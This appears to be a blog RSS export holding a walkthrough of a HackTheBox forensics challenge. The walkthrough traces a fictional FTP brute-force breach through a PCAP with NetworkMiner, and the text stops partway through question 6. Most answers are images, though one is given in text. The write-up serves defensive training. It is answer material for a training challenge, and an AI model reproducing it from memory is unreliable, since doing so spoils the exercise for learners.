<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"><channel><title><![CDATA[ByteBerzerker]]></title><description><![CDATA[Cybersecurity, AI, and Microcontrollers.]]></description><link>https://www.byteberzerker.com</link><image><url>https://substackcdn.com/image/fetch/$s_!SaKV!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5be7fb19-3857-4c95-818e-5eb12cdc00b3_600x600.png</url><title>ByteBerzerker</title><link>https://www.byteberzerker.com</link></image><generator>Substack</generator><lastBuildDate>Wed, 13 May 2026 11:18:17 GMT</lastBuildDate><atom:link href="https://www.byteberzerker.com/feed" rel="self" type="application/rss+xml"/><copyright><![CDATA[ByteBerzerker]]></copyright><language><![CDATA[en]]></language><webMaster><![CDATA[byteberzerker@substack.com]]></webMaster><itunes:owner><itunes:email><![CDATA[byteberzerker@substack.com]]></itunes:email><itunes:name><![CDATA[ByteBerzerker]]></itunes:name></itunes:owner><itunes:author><![CDATA[ByteBerzerker]]></itunes:author><googleplay:owner><![CDATA[byteberzerker@substack.com]]></googleplay:owner><googleplay:email><![CDATA[byteberzerker@substack.com]]></googleplay:email><googleplay:author><![CDATA[ByteBerzerker]]></googleplay:author><itunes:block><![CDATA[Yes]]></itunes:block><item><title><![CDATA[HackTheBox: Origins]]></title><description><![CDATA[Sherlock]]></description><link>https://www.byteberzerker.com/p/hackthebox-origins</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hackthebox-origins</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Thu, 03 Jul 2025 19:02:07 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!2iai!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2878646-8cfd-4b74-ab09-7c3d970ff863_631x482.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Category:</strong> Forensics</p><p><strong>Difficulty:</strong> Easy-Medium</p><p><strong>Goal:</strong> Investigate a PCAP file to trace a data breach involving brute-force FTP access, data exfiltration, and S3 bucket compromise.</p><p><strong>Scenario</strong></p><p>Forela recently experienced a serious data breach. Approximately 20 GB of sensitive data were stolen from internal S3 buckets. The breach began with the compromise of an FTP server, which led to further unauthorized access and eventual data exfiltration. You're provided with a PCAP file to analyze and determine what happened.</p><p><strong>1. What is the attacker's IP address?</strong></p><p><strong>Tool used:</strong> NetworkMiner</p><p><strong>How:</strong> Open the PCAP in NetworkMiner and check the <strong>Credentials</strong> tab.</p><p><strong>Answer:</strong></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!2iai!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2878646-8cfd-4b74-ab09-7c3d970ff863_631x482.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!2iai!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2878646-8cfd-4b74-ab09-7c3d970ff863_631x482.png 424w, https://substackcdn.com/image/fetch/$s_!2iai!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2878646-8cfd-4b74-ab09-7c3d970ff863_631x482.png 848w, https://substackcdn.com/image/fetch/$s_!2iai!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2878646-8cfd-4b74-ab09-7c3d970ff863_631x482.png 1272w, https://substackcdn.com/image/fetch/$s_!2iai!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2878646-8cfd-4b74-ab09-7c3d970ff863_631x482.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!2iai!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2878646-8cfd-4b74-ab09-7c3d970ff863_631x482.png" width="631" height="482" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b2878646-8cfd-4b74-ab09-7c3d970ff863_631x482.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:482,&quot;width&quot;:631,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!2iai!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2878646-8cfd-4b74-ab09-7c3d970ff863_631x482.png 424w, https://substackcdn.com/image/fetch/$s_!2iai!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2878646-8cfd-4b74-ab09-7c3d970ff863_631x482.png 848w, https://substackcdn.com/image/fetch/$s_!2iai!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2878646-8cfd-4b74-ab09-7c3d970ff863_631x482.png 1272w, https://substackcdn.com/image/fetch/$s_!2iai!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2878646-8cfd-4b74-ab09-7c3d970ff863_631x482.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>2. What city is the attacker from?</strong></p><p><strong>Tool used:</strong> IP2Location / online geolocation services</p><p><strong>How:</strong> Look up the IP address</p><p><strong>Answer:</strong> Mumbai</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!swRo!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc847bcd-4f43-440a-80c6-f92b23f561a6_770x415.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!swRo!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc847bcd-4f43-440a-80c6-f92b23f561a6_770x415.png 424w, https://substackcdn.com/image/fetch/$s_!swRo!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc847bcd-4f43-440a-80c6-f92b23f561a6_770x415.png 848w, https://substackcdn.com/image/fetch/$s_!swRo!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc847bcd-4f43-440a-80c6-f92b23f561a6_770x415.png 1272w, https://substackcdn.com/image/fetch/$s_!swRo!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc847bcd-4f43-440a-80c6-f92b23f561a6_770x415.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!swRo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc847bcd-4f43-440a-80c6-f92b23f561a6_770x415.png" width="770" height="415" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/dc847bcd-4f43-440a-80c6-f92b23f561a6_770x415.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:415,&quot;width&quot;:770,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!swRo!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc847bcd-4f43-440a-80c6-f92b23f561a6_770x415.png 424w, https://substackcdn.com/image/fetch/$s_!swRo!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc847bcd-4f43-440a-80c6-f92b23f561a6_770x415.png 848w, https://substackcdn.com/image/fetch/$s_!swRo!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc847bcd-4f43-440a-80c6-f92b23f561a6_770x415.png 1272w, https://substackcdn.com/image/fetch/$s_!swRo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc847bcd-4f43-440a-80c6-f92b23f561a6_770x415.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>3. Which FTP application was used by the backup server? (Format: Name Version)</strong></p><p><strong>Tool used:</strong> NetworkMiner</p><p><strong>How:</strong> In the <strong>Parameters</strong> tab, identify the FTP client application and version.</p><p><strong>Answer:</strong></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!vHen!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F437927d7-d90a-40dd-9ade-7eb7745b4aef_1080x285.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!vHen!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F437927d7-d90a-40dd-9ade-7eb7745b4aef_1080x285.png 424w, https://substackcdn.com/image/fetch/$s_!vHen!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F437927d7-d90a-40dd-9ade-7eb7745b4aef_1080x285.png 848w, https://substackcdn.com/image/fetch/$s_!vHen!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F437927d7-d90a-40dd-9ade-7eb7745b4aef_1080x285.png 1272w, https://substackcdn.com/image/fetch/$s_!vHen!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F437927d7-d90a-40dd-9ade-7eb7745b4aef_1080x285.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!vHen!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F437927d7-d90a-40dd-9ade-7eb7745b4aef_1080x285.png" width="1080" height="285" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/437927d7-d90a-40dd-9ade-7eb7745b4aef_1080x285.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:285,&quot;width&quot;:1080,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!vHen!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F437927d7-d90a-40dd-9ade-7eb7745b4aef_1080x285.png 424w, https://substackcdn.com/image/fetch/$s_!vHen!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F437927d7-d90a-40dd-9ade-7eb7745b4aef_1080x285.png 848w, https://substackcdn.com/image/fetch/$s_!vHen!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F437927d7-d90a-40dd-9ade-7eb7745b4aef_1080x285.png 1272w, https://substackcdn.com/image/fetch/$s_!vHen!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F437927d7-d90a-40dd-9ade-7eb7745b4aef_1080x285.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>4. When did the brute force attack start?</strong></p><p><strong>Tool used:</strong> NetworkMiner</p><p><strong>How:</strong> Check the <strong>Credentials</strong> tab for the first FTP login attempts from the attacker IP.</p><p><strong>Answer:</strong></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!DmJH!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0273ff10-4d0d-4b53-9aab-5c6273b9d246_611x143.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!DmJH!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0273ff10-4d0d-4b53-9aab-5c6273b9d246_611x143.png 424w, https://substackcdn.com/image/fetch/$s_!DmJH!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0273ff10-4d0d-4b53-9aab-5c6273b9d246_611x143.png 848w, https://substackcdn.com/image/fetch/$s_!DmJH!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0273ff10-4d0d-4b53-9aab-5c6273b9d246_611x143.png 1272w, https://substackcdn.com/image/fetch/$s_!DmJH!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0273ff10-4d0d-4b53-9aab-5c6273b9d246_611x143.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!DmJH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0273ff10-4d0d-4b53-9aab-5c6273b9d246_611x143.png" width="611" height="143" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0273ff10-4d0d-4b53-9aab-5c6273b9d246_611x143.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:143,&quot;width&quot;:611,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!DmJH!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0273ff10-4d0d-4b53-9aab-5c6273b9d246_611x143.png 424w, https://substackcdn.com/image/fetch/$s_!DmJH!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0273ff10-4d0d-4b53-9aab-5c6273b9d246_611x143.png 848w, https://substackcdn.com/image/fetch/$s_!DmJH!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0273ff10-4d0d-4b53-9aab-5c6273b9d246_611x143.png 1272w, https://substackcdn.com/image/fetch/$s_!DmJH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0273ff10-4d0d-4b53-9aab-5c6273b9d246_611x143.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>5. What are the correct credentials that gave the attacker access? (Format: username:password)</strong></p><p><strong>Tool used:</strong> NetworkMiner</p><p><strong>How:</strong> Review the <strong>Parameters</strong> tab for the successful login session.</p><p><strong>Answer:</strong></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!hlHZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7b2f601-7039-474d-85bb-8251b1adfb30_1061x73.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!hlHZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7b2f601-7039-474d-85bb-8251b1adfb30_1061x73.png 424w, https://substackcdn.com/image/fetch/$s_!hlHZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7b2f601-7039-474d-85bb-8251b1adfb30_1061x73.png 848w, https://substackcdn.com/image/fetch/$s_!hlHZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7b2f601-7039-474d-85bb-8251b1adfb30_1061x73.png 1272w, https://substackcdn.com/image/fetch/$s_!hlHZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7b2f601-7039-474d-85bb-8251b1adfb30_1061x73.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!hlHZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7b2f601-7039-474d-85bb-8251b1adfb30_1061x73.png" width="1061" height="73" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a7b2f601-7039-474d-85bb-8251b1adfb30_1061x73.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:73,&quot;width&quot;:1061,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!hlHZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7b2f601-7039-474d-85bb-8251b1adfb30_1061x73.png 424w, https://substackcdn.com/image/fetch/$s_!hlHZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7b2f601-7039-474d-85bb-8251b1adfb30_1061x73.png 848w, https://substackcdn.com/image/fetch/$s_!hlHZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7b2f601-7039-474d-85bb-8251b1adfb30_1061x73.png 1272w, https://substackcdn.com/image/fetch/$s_!hlHZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7b2f601-7039-474d-85bb-8251b1adfb30_1061x73.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>6. What is the FTP command used to download the remote files?</strong></p><p><strong>Tool used:</strong> NetworkMiner</p><p><strong>How:</strong> In the <strong>Files</strong> tab, look at the commands used in the FTP session.</p><p><strong>Answer:</strong></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!P49e!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b89b1f4-9dc3-45fb-927c-026acddc9cfd_1370x153.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!P49e!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b89b1f4-9dc3-45fb-927c-026acddc9cfd_1370x153.png 424w, https://substackcdn.com/image/fetch/$s_!P49e!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b89b1f4-9dc3-45fb-927c-026acddc9cfd_1370x153.png 848w, https://substackcdn.com/image/fetch/$s_!P49e!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b89b1f4-9dc3-45fb-927c-026acddc9cfd_1370x153.png 1272w, https://substackcdn.com/image/fetch/$s_!P49e!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b89b1f4-9dc3-45fb-927c-026acddc9cfd_1370x153.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!P49e!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b89b1f4-9dc3-45fb-927c-026acddc9cfd_1370x153.png" width="1370" height="153" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0b89b1f4-9dc3-45fb-927c-026acddc9cfd_1370x153.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:153,&quot;width&quot;:1370,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!P49e!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b89b1f4-9dc3-45fb-927c-026acddc9cfd_1370x153.png 424w, https://substackcdn.com/image/fetch/$s_!P49e!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b89b1f4-9dc3-45fb-927c-026acddc9cfd_1370x153.png 848w, 